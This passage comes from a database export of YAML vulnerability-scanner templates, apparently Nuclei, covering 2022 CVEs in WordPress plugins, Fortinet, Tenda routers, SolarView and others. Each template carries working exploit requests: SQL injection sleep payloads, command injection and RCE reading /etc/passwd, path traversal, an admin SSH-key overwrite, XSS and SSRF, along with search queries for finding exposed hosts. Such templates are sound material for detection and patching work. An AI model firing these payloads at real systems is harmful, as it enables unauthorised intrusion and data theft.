epss-score: 0.01515\n epss-percentile: 0.85653\n cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: blocksera\n product: cryptocurrency_widgets_pack\n framework: wordpress\n publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/\n tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=7'\n - 'len(body_1) == 0'\n - 'status_code_1 == 302'\n - 'contains(body_2, \"Cryptocurrency Widgets Pack\")'\n condition: and\n# digest: 4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950", "hash": "0c23a087b338c284f131a1c46ef4d065", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308591" }, "name": "CVE-2022-4060.yaml", "content": "id: CVE-2022-4060\n\ninfo:\n name: WordPress User Post Gallery <=2.19 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e\n - https://wordpress.org/plugins/wp-upg/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4060\n - https://github.com/im-hanzou/UPGer\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4060\n cwe-id: CWE-94\n epss-score: 0.03753\n epss-percentile: 0.91618\n cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: odude\n product: user_post_gallery\n framework: wordpress\n tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n part: body\n words:\n - \"recordsFiltered\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950", "hash": "ba3912a34501fba2b24479bb80e274e2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308592" }, "name": "CVE-2022-4063.yaml", "content": "id: CVE-2022-4063\n\ninfo:\n name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion\n author: theamanrawat\n severity: critical\n description: |\n WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.\n impact: |\n The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.\n remediation: Fixed in version 2.1.4.1.\n reference:\n - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7\n - https://wordpress.org/plugins/inpost-gallery/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4063\n - https://github.com/cyllective/CVEs\n - https://github.com/im-hanzou/INPGer\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4063\n cwe-id: CWE-22\n epss-score: 0.04425\n epss-percentile: 0.92213\n cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pluginus\n product: inpost_gallery\n framework: wordpress\n tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950", "hash": "ad19839f22e743b0e14689894bddac95", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308593" }, "name": "CVE-2022-40684.yaml", "content": "id: CVE-2022-40684\n\ninfo:\n name: Fortinet - Authentication Bypass\n author: Shockwave,nagli,carlosvieira\n severity: critical\n description: |\n Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.\n remediation: |\n Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.\n reference:\n - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py\n - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/\n - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40684\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40684\n cwe-id: CWE-287\n epss-score: 0.97217\n epss-percentile: 0.99817\n cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortiproxy\n tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive\n\nhttp:\n - raw:\n - |\n GET /api/v2/cmdb/system/admin HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Node.js\n Forwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\n X-Forwarded-Vdom: root\n - |\n PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Report Runner\n Content-Type: application/json\n Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\n Content-Length: 610\n\n {\n \"ssh-public-key1\":\"{{randstr}}\"\n }\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n part: body_1\n words:\n - ENC XXXX\n - http_method\n condition: and\n\n - type: word\n part: body_2\n words:\n - Invalid SSH public key.\n - cli_error\n condition: and\n# digest: 4a0a00473045022100ecd342ecd1ddb863f225cc6136e9bc2bee1dd54adfdfe4bd199aae259088ce9902204ae159dde8793d19d05e1809870cd28bb6da2e7a9ce835bdb59a391acfd4000e:922c64590222798bb761d5b6d8e72950", "hash": "935fc3e742e3b1a4cdab970e43296d52", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308594" }, "name": "CVE-2022-40734.yaml", "content": "id: CVE-2022-40734\n\ninfo:\n name: Laravel Filemanager v2.5.1 - Local File Inclusion\n author: arafatansari\n severity: medium\n description: |\n Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.\n remediation: |\n Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor.\n reference:\n - https://github.com/UniSharp/laravel-filemanager/issues/1150\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40734\n - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966\n - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-40734\n cwe-id: CWE-22\n epss-score: 0.01632\n epss-percentile: 0.86143\n cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: unisharp\n product: laravel_filemanager\n shodan-query: http.html:\"Laravel Filemanager\"\n tags: cve,cve2022,laravel,unisharp,lfi,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd\"\n - \"{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950", "hash": "adde88f591c37569b85930996fa9d159", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308595" }, "name": "CVE-2022-40843.yaml", "content": "id: CVE-2022-40843\n\ninfo:\n name: Tenda AC1200 V-W15Ev2 - Authentication Bypass\n author: gy741\n severity: medium\n description: |\n The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.\n reference:\n - https://boschko.ca/tenda_ac1200_router\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-40843\n cwe-id: CWE-287\n epss-score: 0.40937\n epss-percentile: 0.97197\n cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\\(1576\\):*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tenda\n product: w15e_firmware\n tags: cve2022,cve,tenda,auth-bypass,router,iot\n\nhttp:\n - raw:\n - |\n GET /goform/downloadSyslog/syslog.log HTTP/1.1\n Host: {{Hostname}}\n Cookie: W15Ev2_user=\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - '^0\\d{3}$'\n\n - type: word\n part: body\n words:\n - \"[system]\"\n - \"[error]\"\n - \"[wan1]\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"Content-type: config/conf\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950", "hash": "59d41088764891577785ec5e46777623", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308596" }, "name": "CVE-2022-40879.yaml", "content": "id: CVE-2022-40879\n\ninfo:\n name: kkFileView 4.1.0 - Cross-Site Scripting\n author: arafatansari,co5mos\n severity: medium\n description: |\n kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/389\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40879\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-40879\n cwe-id: CWE-79\n epss-score: 0.03708\n epss-percentile: 0.91567\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,kkFileView,xss,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '=PQ

    '\n - '该文件不'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950", "hash": "605870f8385a3c327dde8c5fe992a32e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308597" }, "name": "CVE-2022-40881.yaml", "content": "id: CVE-2022-40881\n\ninfo:\n name: SolarView 6.00 - Remote Command Execution\n author: For3stCo1d\n severity: critical\n description: |\n SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarView.\n reference:\n - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php\n - https://github.com/advisories/GHSA-wx3r-88rg-whxq\n - https://nvd.nist.gov/vuln/detail/CVE-2022-40881\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-40881\n cwe-id: CWE-77\n epss-score: 0.96169\n epss-percentile: 0.99389\n cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: solarview_compact_firmware\n shodan-query: http.favicon.hash:\"-244067125\"\n tags: cve,cve2022,solarview,rce,lfi,contec\nvariables:\n cmd: \"cat${IFS}/etc/passwd\"\n\nhttp:\n - raw:\n - |\n POST /network_test.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n host=%0a{{cmd}}%0a&command=ping\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950", "hash": "818102cecc1ae555eba77720f4665926", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308598" }, "name": "CVE-2022-4117.yaml", "content": "id: CVE-2022-4117\n\ninfo:\n name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site.\n remediation: |\n Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193\n - https://wordpress.org/plugins/iws-geo-form-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4117\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4117\n cwe-id: CWE-89\n epss-score: 0.03413\n epss-percentile: 0.9123\n cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: iws-geo-form-fields_project\n product: iws-geo-form-fields\n framework: wordpress\n tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")'\n condition: and\n# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950", "hash": "dd53c887a91ca70d52fb5de082f15a32", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308599" }, "name": "CVE-2022-4140.yaml", "content": "id: CVE-2022-4140\n\ninfo:\n name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access\n author: theamanrawat\n severity: high\n description: |\n WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can access sensitive files on the server, potentially exposing sensitive information.\n remediation: Fixed in version 2.8.5.\n reference:\n - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7\n - https://wordpress.org/plugins/usc-e-shop/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4140\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-4140\n cwe-id: CWE-552\n epss-score: 0.00932\n epss-percentile: 0.82572\n cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: collne\n product: welcart_e-commerce\n framework: wordpress\n tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950", "hash": "1f80c9b77ab1eda80271c8f412cee76c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859a" }, "name": "CVE-2022-41412.yaml", "content": "id: CVE-2022-41412\n\ninfo:\n name: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery\n author: null_hypothesis\n severity: high\n description: |\n An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.\n reference:\n - https://github.com/renmizo/CVE-2022-41412\n - https://hackerone.com/reports/2445802\n - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb\n - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html\n - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2022-41412\n cwe-id: CWE-918\n epss-score: 0.0012\n epss-percentile: 0.45431\n cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: perfsonar\n product: perfsonar\n fofa-query: title=\"perfSONAR Toolkit\"\n verified: true\n tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    Interactsh Server

    \n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950", "hash": "b409d272413bf06ad3576b8b3671a3b8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859b" }, "name": "CVE-2022-41441.yaml", "content": "id: CVE-2022-41441\n\ninfo:\n name: ReQlogic v11.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41441\n - https://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/\n - http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.html\n - http://reqlogic.com\n - https://reqlogic.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-41441\n cwe-id: CWE-79\n epss-score: 0.00155\n epss-percentile: 0.5093\n cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: reqlogic\n product: reqlogic\n shodan-query: http.html:\"ReQlogic\"\n tags: cve,cve2022,packetstorm,xss,reqlogic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=\"\n - \"{{BaseURL}}/ProcessWait.aspx?POBatch=&WaitDuration=3\"\n\n stop-at-first-match: true\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\") && contains(body_2, \"POProcessTimeout\")'\n condition: and\n# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950", "hash": "f66e6f16519e7407adf26def62cc7c33", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859c" }, "name": "CVE-2022-41473.yaml", "content": "id: CVE-2022-41473\n\ninfo:\n name: RPCMS 3.0.2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability.\n reference:\n - https://github.com/ralap-z/rpcms/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41473\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-41473\n cwe-id: CWE-79\n epss-score: 0.012\n epss-percentile: 0.84884\n cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: 'rpcms'\n product: 'rpcms'\n shodan-query: http.html:\"RPCMS\"\n tags: cve,cve2022,rpcms,xss,'rpcms'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'rpcms'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950", "hash": "6d00f436ea8d25855e47cb1af5da04d8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30859d" }, "name": "CVE-2022-41840.yaml", "content": "id: CVE-2022-41840\n\ninfo:\n name: Welcart eCommerce <=2.7.7 - Local File Inclusion\n author: theamanrawat\n severity: critical\n description: |\n Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability\n - https://wordpress.org/plugins/usc-e-shop/\n - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve\n - https://nvd.nist.gov/vuln/detail/CVE-2022-41840\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-41840\n cwe-id: CWE-22\n epss-score: 0.00738\n epss-percentile: 0.78774\n cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: collne\n product: welcart_e-commerce\n framework: wordpress\n tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne\n\nhttp:\n - method: GET\n path:\n - 